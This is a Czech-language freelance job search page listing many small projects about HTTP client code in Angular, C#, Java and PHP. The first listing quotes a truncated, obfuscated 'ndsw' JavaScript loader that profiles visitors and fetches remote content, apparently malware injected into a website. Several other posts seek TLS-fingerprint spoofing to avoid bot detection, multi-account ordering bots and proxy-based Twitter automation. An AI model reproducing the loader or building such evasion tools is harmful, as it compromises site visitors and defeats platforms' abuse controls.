Filtrovat

Moje poslední hledání
Třídit podle:
Rozpočet
pro
pro
pro
Typ
Dovednosti
Jazyky
    Stav zakázky
    268 httpclient zakázek nalezeno, ceny v EUR

    ...se y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&a...

    €32 (Avg Bid)
    €32 Průměr. nabídka
    24 nabídky

    ...: { "name": "ionic-app-base", "integrations": {}, "type": "angular", "v2": true, "typescript": true, "proxies": [ { "path": "/api", "proxyUrl": "" } ] } this is my : import { Component } from '@angular/core'; import { HttpClient} from '@angular/common/http' @Component({ selector: 'app-home', templateUrl: '', styleUrls: [''], }) export class HomePage { constructor(public http: HttpClient) { ('/api') .subscribe((data) => { ("result") (data); }); } readAPI(URL: string){ return (URL, {}); } } ...

    €23 (Avg Bid)
    €23 Průměr. nabídka
    1 nabídky

    Hello, we need update our existing Angular App (8.3.4) while keeping all functionalities up to date and clean not nesesery part of app. APP module: import { BrowserModule } from '@angular/platform-browser'; import { NgModule } from '@angular/core'; import { HttpClient, HttpClientModule, HTTP_INTERCEPTORS } from '@angular/common/http'; import { HashLocationStrategy, LocationStrategy } from '@angular/common'; import { FormsModule } from '@angular/forms'; import { RouterModule, Router } from '@angular/router'; import { FontAwesomeModule } from '@fortawesome/angular-fontawesome'; import { AppRoutingModule } from './'; import { AuthInterceptor } from './_interceptors/'; import { LoggedUserDirective...

    €185 (Avg Bid)
    €185 Průměr. nabídka
    24 nabídky

    I need to automate a webpage login using httpclient & other libraries, eg., Html Agility in C#. The process: 1) Call the login url. 2) Set userID & Password. Then submit. 3) Enter verification code. Then submit again. The goal is to automate login without using a browser component.

    €13 (Avg Bid)
    €13 Průměr. nabídka
    4 nabídky

    The deliverable is: A...array data or model object) : object : update the updated object - Retrive(string id) : object : return the object - delete(string id) : delete the object - Parameters: - Request - Response - Auth keys / Access tokens. - Exceptions and error handling File Structures: ?FlospayApi — ?Flospay Main class — ?Endpoints — — ?Charge — — ?Customer — — ?Source — — ?Session — — ?Refund — — ?Review — ?HttpClient — — ?Request — — ?Response — ?Exceptions — — ?CardErrorException — — ?SourceErrorException — — ?ChargeErrorException — — ?RefundErrorException — — ?ResourceErrorException — &...

    €46 (Avg Bid)
    €46 Průměr. nabídka
    1 nabídky

    ...returned at #5. ::"Object reference not set to an instance of an object." public class GrantService { public static async Task<GrantApplication> SubmitGrant(GrantApplication ga,string file, string FileName, StreamContent FileData) { Uri requestUri = new Uri($"{}/grantapplication/SubmitGrantApplication"); try { var upfilebytes = (file); //using (HttpClient client = new HttpClient()) //{ // //MultipartFormDataContent content = new MultipartFormDataContent(); // //ByteArrayContent baContent = new ByteArrayContent(upfilebytes); // //StringContent GA = new StringContent((ga)); // //(baContent, "Files", FileName); // //(GA, "GA"); // //(content); // //var response = await (requestUri

    €125 (Avg Bid)
    €125 Průměr. nabídka
    5 nabídky

    Description The goal is to display a progression bar depending on the state of the download of a zip file. We will only have to make the request not the UI part. technologies : Angular 11, ionic 5, capacitor 2 and laravel 8. The problem right now we have try two solution. using the plugins fileTr...to make the request not the UI part. technologies : Angular 11, ionic 5, capacitor 2 and laravel 8. The problem right now we have try two solution. using the plugins fileTransfer made by ionic, the file is downloaded but we are unable to use the method onProgress(). Second solution, we tried making are own http request using angular HttpClient but we are facing CORS error for unknown reason. In the end, if you choses to make a call with angular HttpClient, make those requ...

    €107 (Avg Bid)
    €107 Průměr. nabídka
    11 nabídky
    woo rest api -- 3 Ukončeno left

    Hi, I got this error PHP Fatal error: Uncaught AutomatticWooCommerceHttpClientHttpClientException: cURL Error: Operation timed out after 15003 milliseconds with 0 bytes received Please bid on the project if you have experience on Woo Rest Api See this link and tell me what do you gonna do with this error.

    €28 (Avg Bid)
    €28 Průměr. nabídka
    7 nabídky
    woo rest api -- 2 Ukončeno left

    Hi, I got this error PHP Fatal error: Uncaught AutomatticWooCommerceHttpClientHttpClientException: cURL Error: Operation timed out after 15003 milliseconds with 0 bytes received Please bid on the project if you have experience on Woo Rest Api See this link and tell me what do you gonna do with this error.

    €25 (Avg Bid)
    €25 Průměr. nabídka
    4 nabídky
    woo rest api Ukončeno left

    Hi, I got this error PHP Fatal error: Uncaught AutomatticWooCommerceHttpClientHttpClientException: cURL Error: Operation timed out after 15003 milliseconds with 0 bytes received in Who can help me solve it

    €56 (Avg Bid)
    €56 Průměr. nabídka
    4 nabídky

    I have a text file that I need to post to an API endpoint using httpclient. Posting to this endpoint requires authentication (username, password) I need C# code to achive this process.

    €27 (Avg Bid)
    €27 Průměr. nabídka
    16 nabídky

    I need someone to write me a Java class that sends a varying number (approximately 500-700) of HTTP GET requests concurrently, as robustly and fast as possible. Then, it should provide me a way to parse the JSON response (no need to do this, I already have the methods written for that). I have tried using the java 11 HttpClient class, however, it seemed to be slow and unreliable at times. A possible solution could be to use the Async Http Client, available at:

    €33 (Avg Bid)
    €33 Průměr. nabídka
    6 nabídky

    ...the error code WooCommerce/HttpClient/:350Message:Error: <p>There has been a critical error on this website.</p><p><a href="">Learn more about troubleshooting WordPress.</a></p> [internal_server_error] laravel/framework/src/Illuminate/Database/:664Message:Error while sending STMT_PREPARE packet. PID=31743 (SQL: select * from `transactions` where `business_id` = 1 and `woocommerce_order_id` is not null) Woocommerce/Utils/:1413Message:Undefined property: stdClass::$arrival-shipment /Woocommerce/Utils/:1413Message:Undefined property: stdClass::$arrival-shipment pos/vendor/automattic/woocommerce/src/WooCommerce/HttpClient/:350Message:Error:

    €23 (Avg Bid)
    €23 Průměr. nabídka
    8 nabídky

    Dear Java Developer, I need a Java developer very familiar with Micronaut framework. I have HTTPClient that calls anther API, I need to get back the body and send it as is. Pluse I need the BasicAuth variables to go into a configuration file. It is only few lines of code. The work will be done in pair-programming. Thanks, Ghazi Triki

    €23 (Avg Bid)
    €23 Průměr. nabídka
    2 nabídky

    I have a weird issue with HttpClient it's response is "<html><body><script type="text/javascript" src="/" ></script><script>function toNumbers(d){var e=[];(/(..)/g,function(d){(parseIn ... etc... but when I use jsonplacesholder's todo example it's response is in the correct format. { "userId": 1, "id": 1, "title": "delectus aut autem", "completed": false } I would need someone to teamview my pc and help me solve this issue.

    €28 (Avg Bid)
    €28 Průměr. nabídka
    1 nabídky

    I have a project regarding C# that implements socks proxies support to HttpClient, I need helping reworking on a function, I need someone experienced in C#, and who understands how sockets works... It's a simple project that will require the rework in only 1 function, can get the job done pretty fast if he knows what he is doing.

    €120 (Avg Bid)
    €120 Průměr. nabídka
    12 nabídky

    Please get to the point !!! If you are not rigorous and do not write a clean code, do not write me. I have an external api made with j2ee that I have to consume with symfony by making the CRUD and I use the HttpClient module of symfony but as I have never done it before, I already block on the POST method. But the final system that I would like to have in place is the DTO (data transfer objects) or services to be able to consume the api. If someone has already had similar experiences. I would like to see examples of sites that you have already made. Possibility of long term collaboration.

    €133 (Avg Bid)
    €133 Průměr. nabídka
    2 nabídky

    Se busca desarrollador front end para mejoras en plataforma web. El desarrollo incluye 2 pantallas y ciertas mejoras puntuales que se explicarán en el primer contacto con el Freelance. Debe ser de habla hispana Experiencia Angular2++ Angular_Routing Angular Inputs - Outputs Angular Event-Bi...desarrollador front end para mejoras en plataforma web. El desarrollo incluye 2 pantallas y ciertas mejoras puntuales que se explicarán en el primer contacto con el Freelance. Debe ser de habla hispana Experiencia Angular2++ Angular_Routing Angular Inputs - Outputs Angular Event-Binding Angular two-Binding Angular Component Angular Service Angular Interpolation Angular Module AngularCommon -> HttpClient Javascript Typescript Html Css && Css-grid && Tailwind O...

    €136 (Avg Bid)
    €136 Průměr. nabídka
    10 nabídky
    Extend mobile app Ukončeno left

    We're developing a warehouse management platform for our customers, that manage crop sales from smallholder farmers to our customers. Many thousand warehouses are targeted all over Ghana. Through better storage we'll enabl...this margin. Payment shall be done via mobile money to our platform, farmer profit share are managed and distributed by our platform. You'll be implementing the mobile app part of this platform, for android native. Technologies needed: - android native kotlin programming - Livedata, Room, Fragments - Firebase (Crashlytics, Database) - Ghana mobile money integration Nice-to-have: - REST-client/Httpclient (Ktor) - CI/CD - Unit-Testing/Integration Testing of Apps - Spring-Boot/JHipster (that would be for the server side) - Integration of fingerprin...

    €14 / hr (Avg Bid)
    €14 / hr Průměr. nabídka
    34 nabídky

    At there are instruction to use their new API system but the instruction are very basic. I need it written in an VB.NET HTTPClient call like on For you task I need for you to produce a VB.NET function that passes the payload of { "criteria": { "org_names": [ "EMORY UNIVERSITY", "JOHNS HOPKINS UNIVERSITY", "NEW ECHOTA BIOTECHNOLOGY, INC.", "UNIV OF NORTH CAROLINA CHAPEL HILL" ] } } and gets a return. I will parse the return. I've included my current function. It just needs to work.

    €28 (Avg Bid)
    €28 Průměr. nabídka
    4 nabídky

    Hi. I offer you a project. You need to log in to write on Twitter, change your profile, and tweet. You should not use a web browser, you should use webclient or httpclient, and you should be able to find the tweets created when you search them. Currently, the program can tweet, but it cannot be found when searching. It should be written in C#, and you shouldn't use the twitter api. Please tell me your budget and possible period.

    €138 (Avg Bid)
    €138 Průměr. nabídka
    1 nabídky

    ...three conditions are the baseline integration, but feel free to add on more functionality to your checkout flow. Lastly, as there are example integrations online, no pre-built libraries or example code may be used in your solution. Here are some examples of what we are referring to: OK to use: • PHP: cURL library for HTTP POST requests • Python: requests library • Node: express/axios • C#: HttpClient Not ok to use: API wrappers. For example: • • • • • Helpful Links • Drop-in Documentation: 1. 2. https://docs

    €168 (Avg Bid)
    €168 Průměr. nabídka
    7 nabídky

    You need to log in to Twitter and write a post after changing your profile. When logging in, log in using a proxy. During the login process, you may be asked what your email address is. Email address is provided. It should be written in C#. You must use webclient or httpclient.

    €106 (Avg Bid)
    €106 Průměr. nabídka
    2 nabídky

    I have created post method in Asp.net MVC and called this Api in web application successfully by using httpclient and posted the method with models, but again i need to create update Web Api Method to be calling as same as in web application using httpclient, the idea will be like this when i clicked the edit button after saving the data inside datalist view then again i clicked edit button and it should be edited and update my api same time when required item is selected by ID.

    €25 (Avg Bid)
    €25 Průměr. nabídka
    14 nabídky

    I have a ASMX .Net web page that has that I can not get to compile in Visual Studio 2019. What I want is a simple 2019 Visual Studio project that I can deploy to a web site that will run and not throw any errors. You do not have to have any data connects just the references. Either Visual Studio 2017 or 2019 is fine. Using client As HttpClient = New HttpClient() throws an error in a VB.Net . I have read all of the Google posts and I believe that I have the right references.

    €14 (Avg Bid)
    €14 Průměr. nabídka
    1 nabídky

    ...deliverables for scope of work with customers and/or management • Make modifications to automation jobs and schedules for jobs in non-production environment Requirements • 3+ years of experience in software test engineering. • Experience with software QA methodologies, tools and processes. • Hands-on experience with testing REST services and building automation frameworks using RESTAssured, HTTPClient, SuperTest or PostMan • Hands-on experience with testing web applications and building automation frameworks using Protractor, NightwatchJS, WebdriverIO or Selenium • Experience with Agile software development lifecycle. • Should have experience in Java/JavaScript • Hands on experience in API Testing. • Experience of building te...

    €325 (Avg Bid)
    €325 Průměr. nabídka
    16 nabídky

    Exception 'AutomatticWooCommerceHttpClientHttpClientException' with message 'JSON ERROR: Syntax error'

    €20 (Avg Bid)
    €20 Průměr. nabídka
    8 nabídky

    1. Create CRUD operations using SharePoint REST API with 2-3 SharePoint Lists only and access to row items attachments. 2. Calls REST API using Angular HttpModule/HttpClient preferably version 7-9 (not AngularJS)

    €153 (Avg Bid)
    €153 Průměr. nabídka
    12 nabídky

    I want to consume WCF service using httpclient in my .net core application

    €29 (Avg Bid)
    €29 Průměr. nabídka
    13 nabídky

    I have a plugin that uses Httpclient to get data from other sites. But the problem is it can not render JavaScript which is mandatory for some sites to fetch the data. I need a headless browser that can get this data and of course it should be working perfectly with this plugin.

    PHP
    €141 (Avg Bid)
    €141 Průměr. nabídka
    12 nabídky

    Our httpclient is in need of matching the TLS fingerprint of Chrome (pre Chrome 83). Developer should be able to match the clienthello, cipher suites & cipher suite order, extensions, ALPN, etc. TLS Versions 1.3, 1.2, and 1.1 are all supported and enabled on the client through adding Conscrypt as a security provider however the exact fingerprint does not match a browser (chrome). Helpful websites that can explain TLS or display your fingerprint/clienthello: - - - - The goal is to match the Browser TLS fingerprint in the HTTPclient. Because, as seen in this statement from the first site mentioned, an httpclient can be detected

    €157 (Avg Bid)
    €157 Průměr. nabídka
    4 nabídky

    Hi Freelancer, I need an example of code in .net 4.7 (not .net Core) where I can send a push notification with http/2 token based authentication to an IOS devide. It is OK to use the for this because the HttpClient class does not support http/2 protocoll. VB Language is prevered. If necessary also C #. In the past I have used the old P12 Certificate authentication but now I have to switch to the http/2 token based authentication. P8 Certificate, Key ID and Team ID I already have. In the example project I would like to select my p8 certificate and enter the device token to which the push notification should send.

    €214 (Avg Bid)
    €214 Průměr. nabídka
    2 nabídky

    ...and other functions Have peer software to give reference Ii. Requirement description 1. In the first stage, complete the construction of the whole framework and all functional modules. 10 days. 2. In the second stage, the test speed was optimized on the basis of the first stage. Assist in fixing bugs. Five days. Iii. Packet requirements Familiar with web crawler, HTTP request simulation, Java, HttpClient based, Multiple Thread, File I/O and other major technologies, log in and place orders based on multi-threaded Multiple accounts. Ability to complete tasks independently, experience in similar projects, experience in risk control of breakthrough is preferred. You need to communicate in real time. It's best to communicate while you're developing, so you don't have t...

    €685 (Avg Bid)
    €685 Průměr. nabídka
    8 nabídky

    I am developing add-ins on Revit software, in that case, i need developing a Add-in License Management System: - Create get / post httpClient to manage add-in and user information. - Create Website UX/UI to manage add-in information (Admin and User UI) - Design SQL Database system - Provide hosting, server; support instruction and later maintenance Stack: WebAPI: (.NET Core Web API) , FullStack: (MVC + VueJS), Sql: (Optional)

    €502 (Avg Bid)
    €502 Průměr. nabídka
    3 nabídky

    Need couple of hours support to resolve issue related to 'Angular 5+ : How to put a delay to a / all HttpClient requests?'

    €240 (Avg Bid)
    €240 Průměr. nabídka
    6 nabídky
    Angular post Ukončeno left

    required a code snippet for the project, which Angular 8 http or httpClient post to the API hosted in , need to send request data as body. Here is the API url: API is available to all domains and public now. you can test it first and please let me know if it successful.

    €14 (Avg Bid)
    €14 Průměr. nabídka
    4 nabídky

    ...PHP Fatal error: Uncaught AutomatticWooCommerceHttpClientHttpClientException: Error: Invalid parameter(s): status [rest_invalid_param] in /home/xxx/public_html/task/vendor/automattic/woocommerce/src/WooCommerce/HttpClient/ Stack trace: #0 /home/xxx/public_html/task/vendor/automattic/woocommerce/src/WooCommerce/HttpClient/(386): AutomatticWooCommerceHttpClientHttpClient->lookForErrors(Object(stdClass)) #1 /home/xxx/public_html/task/vendor/automattic/woocommerce/src/WooCommerce/HttpClient/(422): AutomatticWooCommerceHttpClientHttpClient->processResponse() #2 /home/xxx/public_html/task/vendor/automattic/woocommerce/src/WooCommerce/(82): AutomatticWooCommerceHttpClientHttpClient->request('orders...

    €15 (Avg Bid)
    €15 Průměr. nabídka
    4 nabídky

    Hi, I bought this template: , and I would like to do some works on it. The first step is to connect to my API: I set this: import { HttpClient, HttpHeaders } from '@angular/common/http'; ... constructor(private http: HttpClient) ... getProducts() { return (``); } but it returns an error, and I would like to do it properly. This is a first task, and if it's going well and quick, I will create new milestones. Good luck!

    €24 (Avg Bid)
    €24 Průměr. nabídka
    7 nabídky

    I've got a C# project that uses FileSystemWatcher to detect files added to a folder and then HTTP POST them 1 by 1 to a web server using HttpClient. It does work, but only sometimes. There doesn't seem to be any resilient error handling. These are the main issues I have: A file is detected and uploaded more than once. A file is detected but not uploaded. The web server encounters a problem causing the file to disappear. It should retry any upload that doesn't return "HTTP 200" 5 times before progressing to the next file. The existing project will be sent to you. I expect the fixed project to be able to handle 500 images of ~500KB and upload them 1 at a time.

    €154 (Avg Bid)
    €154 Průměr. nabídka
    13 nabídky
    C# HTTP POST File Ukončeno left

    I need a .net C# Windows Form project. The form will contain: 1 textbox 1 button The user will enter a filepath in the textbox, then press the button to start. When started, the application will monitor this filepath using FileSystemWatcher for new files created. Files Created will need to be added to a queue. Files queued need to be POSTed using HttpClient to "" The queue will only progress once the POST has received an HTTP response.

    €36 (Avg Bid)
    €36 Průměr. nabídka
    5 nabídky

    ...We are headquartered in Malta and the UK but operate across Europe and in the US. We build Artificial Intelligence solutions which allow businesses to get closer to their customers over multiple channels and languages. Our team is energetic, motivated, driven and passionate about growth. Prerequisites: - Good understanding of C#, especially on how to send out HttpRequests with the built-in HttpClient library. - Use of NUnit library to write tests, use of Moq to mock data in tests - This library will be used as a plugin in the ebo bot core system. The library will act like a mapping between our ebo bot core and a third party system. - The library will receive parameters that needs to be mapped to the parameters of the third party system. We offer a NuGet package for this to make...

    €20 / hr (Avg Bid)
    €20 / hr Průměr. nabídka
    39 nabídky

    We are looking for an Android developer responsible for the development and maintenance of applications aimed at a vast number of diverse Android devices. Your primary focus will be the development of Android applications and their integration with back-end services. You will be working along-side other engineers and developers working on different layers of the in...development of Android applications and their integration with back-end services. You will be working along-side other engineers and developers working on different layers of the infrastructure. Therefore, commitment to collaborative problem solving, sophisticated design, and creating quality products is essential. Technology Material Design FCM notifications Google Maps Location services HttpClient Java Oops concept...

    €10 / hr (Avg Bid)
    €10 / hr Průměr. nabídka
    19 nabídky

    I need to scrape some html from the website. To do this, I need to first login using a HttpClient, so I can do http requests as a logged user. PrimeVideo website redirects to for login then back to primevideo, so it's a bit complex than simply post form data and get the cookie. I need the code to login then make a http call to get the html for an internal webpage. No parsing of resulted html is needed, retry or exception handling. Just a working code to start with. Code should be used on Linux, too, so try to avoid any Windows-specific dll or .exe files. Please note that I cannot provide login/password because they're linked to the Amazon account and credit card, so if you're not a Prime member you need to use the 30 days trial.

    €170 (Avg Bid)
    €170 Průměr. nabídka
    10 nabídky

    ...(). Please check your internet connection and try again. If this problem persists, you should check Stripe's service status at , or let us know at support@stripe.com. (Network error [errno 28]: Operation timed out after 30001 milliseconds with 0 out of 0 bytes received) in /home/pbs/public_html/dev/vendor/stripe/stripe-php/lib/HttpClient/ If I try to connect to cpanel support in whm, it times out....

    €26 (Avg Bid)
    €26 Průměr. nabídka
    13 nabídky

    I need an expert in .net. The required delivery is a new implementation for httpclient with http2 and an new custom httpclient which both allow to set specific ciphers per request and specific tls .

    €150 (Avg Bid)
    €150 Průměr. nabídka
    26 nabídky

    Web project using Visual studio (C#) and AWS. I need all these requirements to be implemented in project 1. Use the repository pattern 2. Use AutoMapper (must be used) 3. GetAll/getById/post/put/delete method 4. Generate your API document (i.e. Swagger docs) 5. Make your API accessible to public (e.g., publish your API to AWS Elast...AutoMapper (must be used) 3. GetAll/getById/post/put/delete method 4. Generate your API document (i.e. Swagger docs) 5. Make your API accessible to public (e.g., publish your API to AWS Elastic Beanstalk) 6. Apigee to manage your API 7. Add at least one security policy to your API proxy 8. Generate portal to provide support to your API client 9. Implement a client to consume your API -Instantiate HttpClient object -invoke all methods provided i...

    €127 (Avg Bid)
    €127 Průměr. nabídka
    16 nabídky

    Very urgent :3 automation resources we need please forward & share REQUIRED SKILLS : looking for someone who has experience in API automation using Java HTTPClient libraries or RestAssured Advanced java skills need Work location Gurgaon ( INDIA ) current ctc ? & expected ctc ? Job type : Full time ( 8 hours daily ) #apitesting #javaarchitect

    €3 / hr (Avg Bid)
    €3 / hr Průměr. nabídka
    12 nabídky

    THIS MUST BE DONE WITH NATIVE PLUGIN IN IONIC V4 : NO OTHER LIBRARY LIKE HTTPCLIENT . AND MUST WORK IN ANDROID PHONE : ionic cordova run android --device NOT : ionic serve TO SEE THE PROBLEM REFER TO THIS PAGE :

    €9 - €28
    €9 - €28
    0 nabídky

    ...end point. A request to get a token with the default configuration needs to provide the following (POST) parameters: grant_type (must be password) client_id client_secret username password I have already tried using postman and the client works like a charm but trying to do as a stand alone java application. This is the code in main application Sample code try { HttpClient client = (); HttpRequest request = () .uri(("http://myurl:8480/rest/v1/auth/token")) .setHeader("client_id", "rest-client") .setHeader("client_secret", "xxxxxxxxxxxxxxxxxxxx") .setHeader("username", "user") .setHeader("Content-Type","ap...

    €153 (Avg Bid)
    €153 Průměr. nabídka
    30 nabídky

    I need code for making async requests to a website (message for the website url & info). The code will simply make a few GET and POST requests while collecing and passing on cookies and POST data. The code will be for example purposes. This should be fairly basic for a skilled coder. Code should be created in VB 2013 or newer.

    €44 (Avg Bid)
    €44 Průměr. nabídka
    5 nabídky

    Nejlepší články z komunity httpclient